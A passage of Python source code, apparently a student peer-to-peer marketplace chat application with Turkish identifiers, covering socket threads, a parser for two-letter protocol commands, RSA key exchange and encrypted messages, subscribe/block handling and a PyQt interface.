\"END\".encode():\r\n\r\n anlamli_data = \"CO:END\"\r\n\r\n elif dataInByte[0:2] == \"PK\".encode():\r\n data = dataInByte.decode()\r\n keys_array = data.split(\":\")\r\n\r\n kullanici_pub_key = rsa.key.PublicKey(int(keys_array[1]), int(keys_array[2])) # pubk(n,e)\r\n crypted_message = rsa.encrypt(str(self.serverID).encode(), kullanici_pub_key)\r\n\r\n self.csoc.sendall(\"PT:\".encode() + crypted_message)\r\n # self.csoc.sendall( crypted_message)\r\n\r\n anlamli_data = \"Public key alısverisi gerceklesti\"\r\n self.lQueue.put(\"PK islemi basarili\")\r\n\r\n elif dataInByte[0:2] == \"PO\".encode():\r\n print(\"Po ya geldik sukur\")\r\n anlamli_data = \"Sifre testi başarili\"\r\n self.lQueue.put(\"PO islemi basarili \"+str(self.serverID)+\"ve\"+str(self.uuid)+\" arasi\")\r\n\r\n elif dataInByte[0:2] == \"PN\".encode():\r\n anlamli_data = \"\"\r\n\r\n\r\n elif dataInByte[0:2] == \"TO\".encode():\r\n print(dataInByte.decode())\r\n type = dataInByte.decode().split(\":\")[1]\r\n uuid = dataInByte.decode().split(\":\")[2]\r\n if (type == \"T\"):\r\n serverTalepFiyat = int(self.talepFihristi.get((int(uuid)))[5]) / int(\r\n self.talepFihristi.get((int(uuid)))[2])\r\n clientAdet = dataInByte.decode().split(\":\")[4]\r\n serverAdet = self.talepFihristi.get((int(uuid)))[2]\r\n if (float(clientAdet) >= float(serverAdet)):\r\n del self.talepFihristi[int(uuid)]\r\n for i in len(self.komsuArzFihristi.get(int(self.serverID))):\r\n if self.komsuArzFihristi.get(int(self.serverID))[i][0] == int(uuid):\r\n self.komsuArzFihristi.get(int(self.serverID))[i][3] = \\\r\n self.komsuArzFihristi.get(int(self.serverID))[i][3] - serverAdet\r\n self.komsuArzFihristi.get(int(self.serverID))[i][6] = \\\r\n self.komsuArzFihristi.get(int(self.serverID))[i][6] - (serverTalepFiyat * serverAdet)\r\n print(\"Yeniler:\")\r\n print(self.talepFihristi)\r\n print(self.komsuArzFihristi)\r\n else:\r\n for i in len(self.komsuArzFihristi.get(int(self.serverID))):\r\n if self.komsuArzFihristi.get(int(self.serverID))[i][0] == int(uuid):\r\n del self.komsuArzFihristi.get(int(self.serverID))[i]\r\n print(\"Yeniler2:\")\r\n print(self.talepFihristi)\r\n print(self.komsuArzFihristi)\r\n serverAdet = float(serverAdet) - float(clientAdet)\r\n self.talepFihristi.get(int(uuid))[2] = serverAdet\r\n self.talepFihristi.get(int(uuid))[5] = serverTalepFiyat * serverAdet\r\n print(self.talepFihristi)\r\n anlamli_data = \"Alisveris basarili\"\r\n if (type == \"A\"):\r\n serverArzFiyat = int(self.arzFihristi.get((int(uuid)))[5]) / int(self.arzFihristi.get((int(uuid)))[2])\r\n clientAdet = dataInByte.decode().split(\":\")[4]\r\n serverAdet = self.arzFihristi.get((int(uuid)))[2]\r\n if (float(clientAdet) >= float(serverAdet)):\r\n del self.arzFihristi[int(uuid)]\r\n for i in range(len(self.komsuTalepFihristi.get(int(self.serverID)))):\r\n if self.komsuTalepFihristi.get(int(self.serverID))[i][0] == int(uuid):\r\n self.komsuTalepFihristi.get(int(self.serverID))[i][3] = \\\r\n self.komsuTalepFihristi.get(int(self.serverID))[i][3] - serverAdet\r\n self.komsuTalepFihristi.get(int(self.serverID))[i][6] = \\\r\n self.komsuTalepFihristi.get(int(self.serverID))[i][6] - (serverArzFiyat * serverAdet)\r\n print(\"Yeniler:\")\r\n print(self.arzFihristi)\r\n print(self.komsuTalepFihristi)\r\n\r\n else:\r\n for i in range(len(self.komsuTalepFihristi.get(int(self.serverID)))):\r\n if self.komsuTalepFihristi.get(int(self.serverID))[i][0] == int(uuid):\r\n del self.komsuTalepFihristi.get(int(self.serverID))[i]\r\n print(\"Yeniler2:\")\r\n print(self.arzFihristi)\r\n print(self.komsuTalepFihristi)\r\n serverAdet = float(serverAdet) - float(clientAdet)\r\n self.talepFihristi(int(uuid))[2] = serverAdet\r\n self.talepFihristi(int(uuid))[5] = serverArzFiyat * serverAdet\r\n anlamli_data = \"Alisveris basarili\"\r\n\r\n\r\n elif dataInByte[0:2] == \"DO\".encode():\r\n list = []\r\n virguldenAyrilmisData = dataInByte.decode().split(\",\")\r\n for i in range(len(virguldenAyrilmisData)):\r\n parsedData = virguldenAyrilmisData[i].split(\":\")\r\n if parsedData[1] == \"BEGIN\":\r\n anlamli_data = \"Talepler alinmaya baslaniyor.\"\r\n elif parsedData[1] == \"END\":\r\n anlamli_data = \"Talep alma islemi sonlandi.\"\r\n else:\r\n try:\r\n talep = parsedData[1:]\r\n list.append(\r\n [int(parsedData[1]), parsedData[2], parsedData[3], int(parsedData[4]), parsedData[5],\r\n parsedData[6], int(parsedData[7])])\r\n anlamli_data = str(talep)\r\n except:\r\n anlamli_data = (talep[0] + \" talebinin yapisi bozuk, ekleme islemi basarisiz\")\r\n self.screenQueue.put(str(anlamli_data))\r\n self.komsuTalepFihristi[int(self.serverID)] = list\r\n\r\n for i in self.komsuTalepFihristi.keys():\r\n for j in self.arzFihristi.keys():\r\n k = 0\r\n for k in range(len(self.komsuTalepFihristi[i])):\r\n if (self.komsuTalepFihristi[i][k][0] == int(j)):\r\n clientButce = self.arzFihristi.get(j)[5] / self.arzFihristi.get(j)[2]\r\n komsuButce = self.komsuTalepFihristi.get(i)[k][6] / self.komsuTalepFihristi.get(i)[k][3]\r\n if (clientButce <= komsuButce and str(self.komsuTalepFihristi.get(i)[k][4]) == str(\r\n self.arzFihristi.get(j)[3])):\r\n self.writeQueue.put(\r\n \"TR:A:\" + str(j) + \":\" + str(self.arzFihristi.get(j)[0]) + \":\" + str(\r\n self.arzFihristi.get(j)[2]) + \":\" + str(self.arzFihristi.get(j)[3]) + \":\" + str(\r\n self.arzFihristi.get(j)[5]))\r\n print(\"TR:A:\" + str(j) + \":\" + str(self.arzFihristi.get(j)[0]) + \":\" + str(\r\n self.arzFihristi.get(j)[2]) + \":\" + str(self.arzFihristi.get(j)[3]) + \":\" + str(\r\n self.arzFihristi.get(j)[5]))\r\n\r\n elif dataInByte[0:2] == \"OO\".encode():\r\n list = []\r\n virguldenAyrilmisData = dataInByte.decode().split(\",\")\r\n for i in range(len(virguldenAyrilmisData)):\r\n parsedData = virguldenAyrilmisData[i].split(\":\")\r\n if parsedData[1] == \"BEGIN\":\r\n anlamli_data = \"Arzlar alinmaya baslaniyor.\"\r\n elif parsedData[1] == \"END\":\r\n anlamli_data = \"Arz alma islemi sonlandi.\"\r\n else:\r\n try:\r\n arz = parsedData[1:]\r\n list.append(\r\n [int(parsedData[1]), parsedData[2], parsedData[3], int(parsedData[4]), parsedData[5],\r\n parsedData[6], int(parsedData[7])])\r\n anlamli_data = str(arz)\r\n except:\r\n anlamli_data = (arz[0] + \" arzinin yapisi bozuk, ekleme islemi basarisiz\")\r\n self.screenQueue.put(str(anlamli_data))\r\n self.komsuArzFihristi[int(self.serverID)] = list\r\n\r\n for i in self.komsuArzFihristi.keys():\r\n for j in self.talepFihristi.keys():\r\n k = 0\r\n for k in range(len(self.komsuArzFihristi[i])):\r\n if (self.komsuArzFihristi[i][k][0] == int(j)):\r\n clientButce = self.talepFihristi.get(j)[5] / self.talepFihristi.get(j)[2]\r\n komsuButce = self.komsuArzFihristi.get(i)[k][6] / self.komsuArzFihristi.get(i)[k][3]\r\n if (clientButce <= komsuButce and str(self.komsuArzFihristi.get(i)[k][4]) == str(\r\n self.talepFihristi.get(j)[3])):\r\n self.writeQueue.put(\r\n \"TR:T:\" + str(j) + \":\" + str(self.talepFihristi.get(j)[0]) + \":\" + str(\r\n self.talepFihristi.get(j)[2]) + \":\" + str(\r\n self.talepFihristi.get(j)[3]) + \":\" + str(self.talepFihristi.get(j)[5]))\r\n print(\"TR:T:\" + str(j) + \":\" + str(self.talepFihristi.get(j)[0]) + \":\" + str(\r\n self.talepFihristi.get(j)[2]) + \":\" + str(self.talepFihristi.get(j)[3]) + \":\" + str(\r\n self.talepFihristi.get(j)[5]))\r\n\r\n elif dataInByte[0:2] == \"MO\".encode():\r\n anlamli_data = \"mesaj gönderildi.\"\r\n\r\n elif dataInByte[0:2] == \"BO\".encode():\r\n print(self.abonelikFihristi)\r\n data = dataInByte.decode()\r\n if data[0:3] == \"BOF\":\r\n self.abonelikFihristi[int(self.serverID)][2] = False\r\n anlamli_data = \"Engel kaldırıldı.\"\r\n elif data[0:3] == \"BOT\":\r\n self.abonelikFihristi[int(self.serverID)][2] = True\r\n anlamli_data = \"Engelledin.\"\r\n if (self.abonelikFihristi[int(self.serverID)][1] == True): # onu üyelikten çıkarıyorum (1. parametre onun bana üye olması)\r\n self.abonelikFihristi[int(self.serverID)][1] = False\r\n else:\r\n anlamli_data = \"Engel durumu değişmedi.\"\r\n print(self.abonelikFihristi)\r\n\r\n\r\n elif dataInByte[0:2] == \"SO\".encode():\r\n\r\n\r\n if(self.abonelikFihristi[int(self.serverID)][1] == False or self.abonelikFihristi[int(self.serverID)][1] ==None):\r\n self.abonelikFihristi[int(self.serverID)][1] = True\r\n anlamli_data = \"Uyelik oluştu.\"\r\n elif(self.abonelikFihristi[int(self.serverID)][1] == True):\r\n self.abonelikFihristi[int(self.serverID)][1] = False\r\n anlamli_data = \"Uyelikten çıkarıldı.\"\r\n else:\r\n anlamli_data = \"Uyelik durumu güncellenemedi.\"\r\n\r\n elif dataInByte[0:2] == \"UO\".encode():\r\n anlamli_data = \"\"\r\n\r\n elif dataInByte[0:2] == \"UN\".encode():\r\n anlamli_data = \"\"\r\n\r\n elif dataInByte[0:2] == \"TO\".encode():\r\n anlamli_data = \"\"\r\n\r\n elif dataInByte[0:2] == \"TN\".encode():\r\n anlamli_data = \"\"\r\n\r\n elif dataInByte[0:2] == \"ER\".encode():\r\n anlamli_data = \"\"\r\n\r\n anlamli_data = \"-Server- \" + anlamli_data\r\n return anlamli_data\r\n\r\n def run(self):\r\n while True:\r\n incoming_data = self.csoc.recv(1024)\r\n # meanful_data = self.incoming_parser(incoming_data.decode().strip())\r\n meanful_data = self.incoming_parser(incoming_data.strip())\r\n self.screenQueue.put(meanful_data)\r\n if incoming_data.strip()[0:2] == \"BY\".encode():\r\n print(\"read thread istemci BY dasın\")\r\n break\r\n self.lQueue.put(\"Read Thread Istemci Sonlandirildi\")\r\n self.csoc.close()\r\n\r\n\r\nclass WriteThreadIstemci(threading.Thread):\r\n def __init__(self, csoc, writeQueue,lQueue):\r\n threading.Thread.__init__(self)\r\n self.csoc = csoc\r\n self.writeQueue = writeQueue\r\n self.lQueue=lQueue\r\n\r\n def run(self):\r\n while True:\r\n if not self.writeQueue.empty():\r\n queueMessage = self.writeQueue.get()\r\n if (type(queueMessage) == str):\r\n print(\"tip stringmiş\")\r\n self.csoc.send(queueMessage.encode())\r\n if queueMessage.strip()[0:2] == \"QU\":\r\n print(\"write thread istemci qu dasın\")\r\n break\r\n else:\r\n print(\"tip string degilmiş\")\r\n self.csoc.send(queueMessage)\r\n self.lQueue.put(\"WriteThreadIstemci sonlandirildi\")\r\n\r\n #self.csoc.close()\r\n\r\n\r\nclass ClientDialog(QMainWindow):\r\n def __init__(self, talepFihristi, arzFihristi, komsuArzFihristi, komsuTalepFihristi, komsuFihristi, abonelikFihristi, uuid, ip, port,\r\n screenQueue,\r\n sistemTipi, geoloc, nickname, my_public_key, my_private_key,lQueue):\r\n\r\n self.writeQueue = queue.Queue()\r\n self.connectedFlag = 0\r\n self.screenQueue = screenQueue\r\n self.uuid = uuid\r\n self.ip = ip\r\n self.port = port\r\n self.sistemTipi = sistemTipi\r\n self.geoloc = geoloc\r\n self.nickname = nickname\r\n self.my_public_key = my_public_key\r\n self.my_private_key = my_private_key\r\n self.talepFihristi = talepFihristi\r\n self.arzFihristi = arzFihristi\r\n self.komsuArzFihristi = komsuArzFihristi\r\n self.komsuTalepFihristi = komsuTalepFihristi\r\n self.komsuFihristi = komsuFihristi\r\n self.abonelikFihristi = abonelikFihristi\r\n\r\n self.karsiServerID={}\r\n\r\n self.clickedKomsuIP = None\r\n self.clickedKomsuPort = None # bir komsuya tiklandiginda connect butonunun calismasi icin gereken bilgiler\r\n self.clickedKomsuUUID = None\r\n\r\n self.lQueue=lQueue\r\n\r\n\r\n\r\n\r\n self.qt_app = QApplication(sys.argv)\r\n QMainWindow.__init__(self, None)\r\n loadUi(\"arayuz.ui\", self)\r\n\r\n self.label_kullaniciBilgisi.setText(self.nickname + \" (ID: \" + str(self.uuid) + \")\")\r\n\r\n self.send_button.clicked.connect(self.outgoing_parser)\r\n self.pushButton_connect.clicked.connect(lambda _, s=\"connect\": self.clickedActionButton(x=s))\r\n self.pushButton_connections.clicked.connect(lambda _, s=\"CS\": self.clickedActionButton(x=s))\r\n self.pushButton_publicKey.clicked.connect(lambda _, s=\"PK\": self.clickedActionButton(x=s))\r\n self.pushButton_demandes.clicked.connect(lambda _, s=\"DM\": self.clickedActionButton(x=s))\r\n self.pushButton_offers.clicked.connect(lambda _, s=\"OF\": self.clickedActionButton(x=s))\r\n self.pushButton_message.clicked.connect(lambda _, s=\"MS\": self.clickedActionButton(x=s))\r\n self.pushButton_subscribe.clicked.connect(lambda _, s=\"SB\": self.clickedActionButton(x=s))\r\n self.pushButton_block.clicked.connect(lambda _, s=\"BL\": self.clickedActionButton(x=s))\r\n self.pushButton_quit.clicked.connect(lambda _, s=\"QU\": self.clickedActionButton(x=s))\r\n self.pushButton_newdemand.clicked.connect(lambda _, s=\"AA\": self.clickedActionButton(x=s))\r\n self.pushButton_newoffer.clicked.connect(lambda _, s=\"AB\": self.clickedActionButton(x=s))\r\n\r\n self.timer = QTimer()\r\n func = functools.partial(self.updateText)\r\n self.timer.timeout.connect(func)\r\n self.timer.start(10)\r\n\r\n self.timerKomsuListesi = QTimer()\r\n func2 = functools.partial(self.updateKomsuListesi)\r\n self.timerKomsuListesi.timeout.connect(func2)\r\n self.timerKomsuListesi.start(2000)\r\n\r\n self.timerUI = QTimer()\r\n func3 = functools.partial(self.updateUI)\r\n self.timerUI.timeout.connect(func3)\r\n self.timerUI.start(10)\r\n\r\n def clickedActionButton(self, x):\r\n data = self.sender.text()\r\n x = str(x)\r\n print(x)\r\n if not (x == \"connect\" or x == \"PK\" or x == \"SB\" or x == \"BL\" or x == \"DM\" or x == \"OF\" or x == \"QU\") and data == \"\":\r\n self.screenQueue.put(\"Local: Lütfen gerekli parametreleri alt kısma yazdıktan sonra butonu kullanın.\")\r\n return\r\n elif x == \"connect\":\r\n dataSplit = data.split(\":\")\r\n\r\n if self.clickedKomsuPort != None and self.clickedKomsuIP != None and len(dataSplit) == 0:\r\n ip = str(self.clickedKomsuIP)\r\n port = int(self.clickedKomsuPort)\r\n else:\r\n if len(dataSplit) == 2:\r\n ip = str(dataSplit[0])\r\n port = int(dataSplit[1])\r\n else:\r\n self.screenQueue.put(\"Local: Yanlış parametre kullanımı.\")\r\n return\r\n\r\n IstTh = IstemciThread(ip, port, self.ip, self.port, self.uuid, self.sistemTipi, self.geoloc,\r\n self.nickname,\r\n self.screenQueue, self.writeQueue, self.talepFihristi, self.arzFihristi,\r\n self.my_public_key, self.my_private_key,self.komsuFihristi,self.abonelikFihristi,self.komsuArzFihristi, self.komsuTalepFihristi, self.lQueue)\r\n IstTh.start()\r\n self.connectedFlag = 1\r\n self.writeQueue.put(\"HE\")\r\n\r\n elif x == \"SB\" or x == \"BL\" or x == \"PK\" or x == \"QU\":\r\n if x == \"QU\":\r\n self.connectedFlag = 0\r\n if x == \"PK\":\r\n x = x+\":\" + str(self.my_public_key.n) + \":\" + str(self.my_public_key.e)\r\n if x == \"BL\":\r\n try:\r\n if self.abonelikFihristi[int(self.clickedKomsuUUID)][2]:#bende engelli mi\r\n karar = \"F\"\r\n else:\r\n karar = \"T\"\r\n komsu_pub_key = rsa.key.PublicKey(int(self.komsuFihristi[int(self.clickedKomsuUUID)][4]),\r\n int(self.komsuFihristi[int(self.clickedKomsuUUID)][3])) # pubk(n,e)\r\n print(karar)\r\n crypted_message = rsa.encrypt(str(karar).encode(), komsu_pub_key)\r\n self.writeQueue.put(\"BL:\".encode() + crypted_message)\r\n\r\n except:\r\n self.screenQueue.put(\"Bağlı olduğunuz komşuyu soldan seçiniz.\")\r\n if x == \"SB\":\r\n try:\r\n if self.abonelikFihristi[int(self.clickedKomsuUUID)][1]: # bende ona abone miyim\r\n karar = \"F\"\r\n else:\r\n karar = \"T\"\r\n komsu_pub_key = rsa.key.PublicKey(int(self.komsuFihristi[int(self.clickedKomsuUUID)][4]),\r\n int(self.komsuFihristi[int(self.clickedKomsuUUID)][3])) # pubk(n,e)\r\n\r\n crypted_message = rsa.encrypt(karar.encode(), komsu_pub_key)\r\n self.writeQueue.put(\"SB:\".encode() + crypted_message)\r\n except:\r\n self.screenQueue.put(\"Bağlı olduğunuz komşuyu soldan seçiniz.\")\r\n\r\n self.writeQueue.put(x)\r\n elif x == \"CS\" or x == \"MS\" or x == \"AA\" or x == \"DM\" or x == \"OF\" or x == \"AB\":\r\n if x == \"MS\":\r\n komsu_pub_key = rsa.key.PublicKey(int(self.komsuFihristi[int(self.clickedKomsuUUID)][4]),\r\n int(self.komsuFihristi[int(self.clickedKomsuUUID)][3])) # pubk(n,e)\r\n\r\n crypted_message = rsa.encrypt(str(data).encode(), komsu_pub_key)\r\n\r\n self.writeQueue.put(\"MS:\".encode() + crypted_message)\r\n else:\r\n self.writeQueue.put(x+\":\"+data)\r\n print(x+\":\"+data)\r\n self.screenQueue.put(\"Local: \" + data)\r\n\r\n\r\n def updateText(self):\r\n\r\n if not self.screenQueue.empty():\r\n data = self.screenQueue.get()\r\n\r\n t = time.localtime()\r\n pt = \"%02d:%02d\" % (t.tm_hour, t.tm_min)\r\n\r\n self.channel.append(pt + \" \" +data)\r\n else:\r\n return\r\n\r\n def updateUI(self):\r\n self.pushButton_subscribe.setText(\"Abone Ol/Çık\")\r\n self.pushButton_block.setText(\"Engelle/En. Kaldır\")\r\n\r\n self.pushButton_connect.setEnabled(True)\r\n self.pushButton_connections.setEnabled(True)\r\n self.pushButton_publicKey.setEnabled(True)\r\n self.pushButton_demandes.setEnabled(True)\r\n self.pushButton_offers.setEnabled(True)\r\n self.pushButton_message.setEnabled(True)\r\n self.pushButton_subscribe.setEnabled(True)\r\n self.pushButton_block.setEnabled(True)\r\n self.pushButton_quit.setEnabled(True)\r\n self.pushButton_newdemand.setEnabled(True)\r\n self.pushButton_newoffer.setEnabled(True)\r\n\r\n def updateKomsuListesi(self):\r\n kullaniciButonlari = []\r\n\r\n for i in reversed(range(self.KomsuListesiLayoutu.count())):\r\n self.KomsuListesiLayoutu.itemAt(i).widget().setParent(\r\n None) # arayuzdeki komsu listesini sildik. yeniden olusturacagiz.\r\n sayac = 0\r\n for key in list(self.komsuFihristi):\r\n kullaniciButonlari.append(sayac)\r\n kullaniciButonlari[sayac] = QPushButton(self.komsuFihristi[key][6])\r\n kullaniciButonlari[sayac].clicked.connect(lambda _, s=key: self.clickedKomsuButonu(x=s))\r\n self.KomsuListesiLayoutu.addWidget(kullaniciButonlari[sayac])\r\n sayac = sayac + 1\r\n\r\n def clickedKomsuButonu(self, x):\r\n self.clickedKomsuIP = self.komsuFihristi[x][0]\r\n self.clickedKomsuPort = self.komsuFihristi[x][1]\r\n self.clickedKomsuUUID = x\r\n\r\n def outgoing_parser(self):\r\n\r\n data = self.sender.text()\r\n self.screenQueue.put(\"Local: \" + data)\r\n\r\n #komsu_pub_key = rsa.key.PublicKey(int(self.komsuFihristi[self.clickedKomsuUUID][4]), int(self.komsuFihristi[self.clickedKomsuUUID][3])) # pubk(n,e)\r\n #print(komsu_pub_key)\r\n if len(data) == 0:\r\n return\r\n if data[0] == \"/\":\r\n\r\n dataSplitted = data.replace(\"/\", \"\").split((\":\"))\r\n command = dataSplitted[0]\r\n\r\n if command == \"connect\": # Bir peer'a /connect:ip:port seklinde baglanmak\r\n ip = dataSplitted[1]\r\n ip = str(ip)\r\n\r\n port = dataSplitted[2]\r\n\r\n\r\n kuuid = dataSplitted[3]\r\n\r\n IstemciQueue=queue.Queue()\r\n\r\n\r\n \"\"\"komsuFihristi[int(parsedData[1])] = [parsedData[2], parsedData[3], parsedData[4], parsedData[5],\r\n parsedData[6], parsedData[7], parsedData[8], parsedData[9]]\"\"\"\r\n IstTh = IstemciThread(ip, port, self.ip, self.port, self.uuid, self.sistemTipi, self.geoloc,\r\n self.nickname, self.screenQueue, self.writeQueue, self.talepFihristi,\r\n self.arzFihristi, self.my_private_key, self.my_private_key,\r\n self.komsuFihristi,self.abonelikFihristi,self.komsuArzFihristi,self.komsuTalepFihristi,self.lQueue)\r\n self.lQueue.put(str(ip))\r\n self.lQueue.put(\"adli ip ile baglanti kuruldu\")\r\n \"\"\"IstTh = IstemciThread(ip, port, self.ip, self.port, self.uuid, self.sistemTipi, self.geoloc,\r\n self.nickname, self.screenQueue, IstemciQueue, self.talepFihristi,\r\n self.arzFihristi, self.my_private_key, self.my_private_key,\r\n self.komsuFihristi, self.abonelikFihristi, self.komsuArzFihristi,\r\n self.komsuTalepFihristi)\"\"\"\r\n IstTh.start()\r\n\r\n self.clickedKomsuPort = port\r\n self.clickedKomsuIP = ip\r\n self.clickedKomsuUUID = kuuid\r\n\r\n self.connectedFlag = 1\r\n\r\n self.writeQueue.put(\"HE\")\r\n elif command == \"quit\" and self.connectedFlag == 1:\r\n self.connectedFlag = 0\r\n self.writeQueue.put(\"QU\")\r\n elif command == \"connections\" and self.connectedFlag == 1:\r\n\r\n num = dataSplitted[1]\r\n self.writeQueue.put(\"BEGIN:\" + num)\r\n elif command == \"publicKey\" and self.connectedFlag == 1:\r\n self.writeQueue.put(dataSplitted.replace(\"/publicKey\", \"PK\"))\r\n elif command == \"demandes\" and self.connectedFlag == 1:\r\n komsu_pub_key = rsa.key.PublicKey(int(self.komsuFihristi[int(self.clickedKomsuUUID)][4]),\r\n int(self.komsuFihristi[int(self.clickedKomsuUUID)][3])) # pubk(n,e)\r\n safData = data.split(\":\", 1)\r\n crypted_m = rsa.encrypt(str(safData[1]).encode(), komsu_pub_key)\r\n cyrpted_message = \"DM\".encode() + \":\".encode() + crypted_m\r\n self.writeQueue.put(cyrpted_message) # TODO: DEMANDES ILE BU TARAFIN DEMANDE LISTESINI GONDER\r\n\r\n elif command == \"offers\" and self.connectedFlag == 1:\r\n komsu_pub_key = rsa.key.PublicKey(int(self.komsuFihristi[int(self.clickedKomsuUUID)][4]),\r\n int(self.komsuFihristi[int(self.clickedKomsuUUID)][3])) # pubk(n,e)\r\n safData = data.split(\":\", 1)\r\n crypted_m = rsa.encrypt(str(safData[1]).encode(), komsu_pub_key)\r\n cyrpted_message = \"OF\".encode() + \":\".encode() + crypted_m\r\n self.writeQueue.put(cyrpted_message) # TODO: OFFERS ILE BU TARAFIN OFFERS LISTESINI GONDER\r\n\r\n elif command == \"message\" and self.connectedFlag == 1:\r\n\r\n komsu_pub_key = rsa.key.PublicKey(int(self.komsuFihristi[int(self.clickedKomsuUUID)][4]),\r\n int(self.komsuFihristi[int(self.clickedKomsuUUID)][3])) # pubk(n,e)\r\n\r\n crypted_message = rsa.encrypt(str(dataSplitted[1]).encode(), komsu_pub_key)\r\n\r\n self.writeQueue.put(\"MS:\".encode() + crypted_message)\r\n print(\"mesaj gönderildiiii\")\r\n\r\n elif command == \"block\" and self.connectedFlag == 1:\r\n komsu_pub_key = rsa.key.PublicKey(int(self.komsuFihristi[int(self.clickedKomsuUUID)][4]),\r\n int(self.komsuFihristi[int(self.clickedKomsuUUID)][3])) # pubk(n,e)\r\n\r\n crypted_message = rsa.encrypt(str(dataSplitted[1]).encode(), komsu_pub_key)\r\n print(\"mesaj crypto\")\r\n self.writeQueue.put(\"BL:\".encode() + crypted_message)\r\n elif command == \"subscribe\" and self.connectedFlag == 1:\r\n komsu_pub_key = rsa.key.PublicKey(int(self.komsuFihristi[int(self.clickedKomsuUUID)][4]),\r\n int(self.komsuFihristi[int(self.clickedKomsuUUID)][3])) # pubk(n,e)\r\n\r\n crypted_message = rsa.encrypt(str(dataSplitted[1]).encode(), komsu_pub_key)\r\n print(\"mesaj crypto\")\r\n self.writeQueue.put(\"SB:\".encode() + crypted_message)\r\n\r\n elif command == \"newdemand\" and self.connectedFlag == 1: #arz\r\n self.writeQueue.put(data.replace(\"/newdemand\", \"AA\")) # yanitleri A0 (olumlu), A1\r\n elif command == \"newoffer\" and self.connectedFlag == 1: #talep gönderme\r\n self.writeQueue.put(data.replace(\"/newoffer\", \"AB\")) # yanitleri A2 (olumlu), A3\r\n else:\r\n if self.connectedFlag == 1:\r\n self.screenQueue.put(\"Local: Command Error.\")\r\n else:\r\n self.screenQueue.put(\"Giris yapilmali\")\r\n else:\r\n self.screenQueue.put(\"Komutlar '/' ile baslamalidir.\")\r\n\r\n self.sender.clear()\r\n\r\n def run(self):\r\n self.show()\r\n self.qt_app.exec_()\r\n\r\n\r\nclass IstemciThread(threading.Thread):\r\n def __init__(self, ip, port, selfIP, selfPORT, uuid, sistemTipi, geoloc, nickname, screenQueue, writeQueue,\r\n talepFihristi,\r\n arzFihristi, my_public_key, my_private_key,komsuFihristi,abonelikFihristi,komsuArzFihristi,komsuTalepFihristi,lQueue):\r\n threading.Thread.__init__(self)\r\n\r\n self.ScreenQueue = screenQueue\r\n self.WriteQueue = writeQueue\r\n self.sistemTipi = sistemTipi\r\n self.geoloc = geoloc\r\n self.nickname = nickname\r\n self.ip = ip\r\n self.port = int(port)\r\n self.selfIP = selfIP\r\n self.selfPORT = selfPORT\r\n self.uuid = uuid\r\n self.my_public_key = my_public_key\r\n self.my_private_key = my_private_key\r\n self.talepFihristi = talepFihristi\r\n self.arzFihristi = arzFihristi\r\n self.komsuFihristi = komsuFihristi\r\n self.komsuArzFihristi = komsuArzFihristi\r\n self.komsuTalepFihristi = komsuTalepFihristi\r\n self.abonelikFihristi = abonelikFihristi\r\n self.lQueue=lQueue\r\n\r\n\r\n def run(self):\r\n s1 = socket.socket()\r\n s1.connect((self.ip, self.port))\r\n metin = str(\"Connected to server with Peer Ip = \" + str(self.ip) + \" and Port = \" + str(self.port))\r\n self.lQueue.put((metin))\r\n\r\n wtIstemci = WriteThreadIstemci(s1, self.WriteQueue,self.lQueue)\r\n rtIstemci = ReadThreadIstemci(s1, self.WriteQueue, self.ScreenQueue, self.uuid, self.ip, self.port, self.selfIP,\r\n self.selfPORT, self.sistemTipi, self.geoloc, self.nickname, self.my_public_key,\r\n self.my_private_key, self.arzFihristi, self.talepFihristi, self.komsuFihristi,self.abonelikFihristi,self.komsuArzFihristi, self.komsuTalepFihristi,self.lQueue)\r\n\r\n wtIstemci.start()\r\n rtIstemci.start()\r\n\r\n\r\nclass WriteThreadServer(threading.Thread):\r\n def __init__(self, csoc, address, threadQueue,lQueue):\r\n threading.Thread.__init__(self)\r\n self.csoc = csoc\r\n self.address = address\r\n self.tqueue = threadQueue\r\n self.lQueue=lQueue\r\n\r\n def run(self):\r\n while True:\r\n queueMessage = self.tqueue.get()\r\n self.csoc.send((queueMessage + '\\n').encode())\r\n if queueMessage[0:2] == \"BY\":\r\n break\r\n self.csoc.close()\r\n\r\n\r\nclass ReadThreadServer(threading.Thread):\r\n def __init__(self, uuid,host,port, csoc, address, screenQueue, threadQueue, komsuFihristi, abonelikFihristi, talepFihristi, arzFihristi, komsuArzFihristi, komsuTalepFihristi, my_public_key,\r\n my_private_key,lQueue):\r\n threading.Thread.__init__(self)\r\n # self.name = name\r\n self.uuid = uuid\r\n self.nickname = None\r\n self.csoc = csoc\r\n self.address = address\r\n self.tQueue = threadQueue\r\n self.komsuFihristi = komsuFihristi\r\n self.komsuArzFihristi = komsuArzFihristi\r\n self.abonelikFihristi = abonelikFihristi\r\n self.komsuTalepFihristi = komsuTalepFihristi\r\n self.talepFihristi = talepFihristi\r\n self.arzFihristi = arzFihristi\r\n self.my_public_Key = my_public_key\r\n self.my_private_key = my_private_key\r\n self.host = host\r\n self.port = port\r\n self.istemciID = 0\r\n self.istemciDurum = False\r\n self.screenQueue = screenQueue\r\n self.kisi_var_mi = False\r\n self.uuid1 = 0 # rg\r\n self.uuid2 = 0 # ig\r\n\r\n # b\r\n self.kullanici_ip = \"\"\r\n self.kullanici_port = 0\r\n self.kullanici_geo = \"\"\r\n self.kullanici_tipi = \"\"\r\n self.kullanici_ismi = \"\"\r\n self.kullanici_engelDurumu = False\r\n self.kullanici_publickey = None\r\n self.lQueue=lQueue\r\n\r\n def parser(self, dataInByte):\r\n # def parser(self, data):\r\n\r\n # parsedData = data.split(\":\")\r\n\r\n if dataInByte[0:2] == \"RG\".encode():\r\n data = dataInByte.decode()\r\n\r\n parsedData = dataInByte.decode().split(\":\")\r\n self.uuid1 = int(parsedData[1])\r\n for key in self.komsuFihristi.keys(): # Komsu fihristinde daha onceden var mi?\r\n if (int(parsedData[1]) == key):\r\n self.kisi_var_mi = True\r\n self.istemciID = key\r\n break\r\n if self.kisi_var_mi: # Komsu fihristinde daha onceden var.\r\n if (self.abonelikFihristi[int(self.istemciID)][2] == True): # Kisi listesinde var ve engelli mi?\r\n self.tQueue.put(data.replace(\"RG\", \"RN\"))\r\n else: # Kisi listesinde var ve engelli degil mi?\r\n self.istemciDurum = True\r\n self.tQueue.put(data.replace(\"RG\", \"RO\"))\r\n else: # Kisi listesinde yok mu?\r\n self.tQueue.put(data.replace(\"RG\", \"RNN\")) # kisi listesinde yok ama ekleniyo ?\r\n elif dataInByte[0:3] == \"END\".encode():\r\n self.tQueue.put(\"END\")\r\n\r\n elif dataInByte[0:5] == \"BEGIN\".encode():\r\n if (self.abonelikFihristi[int(self.istemciID)][2] == True):\r\n 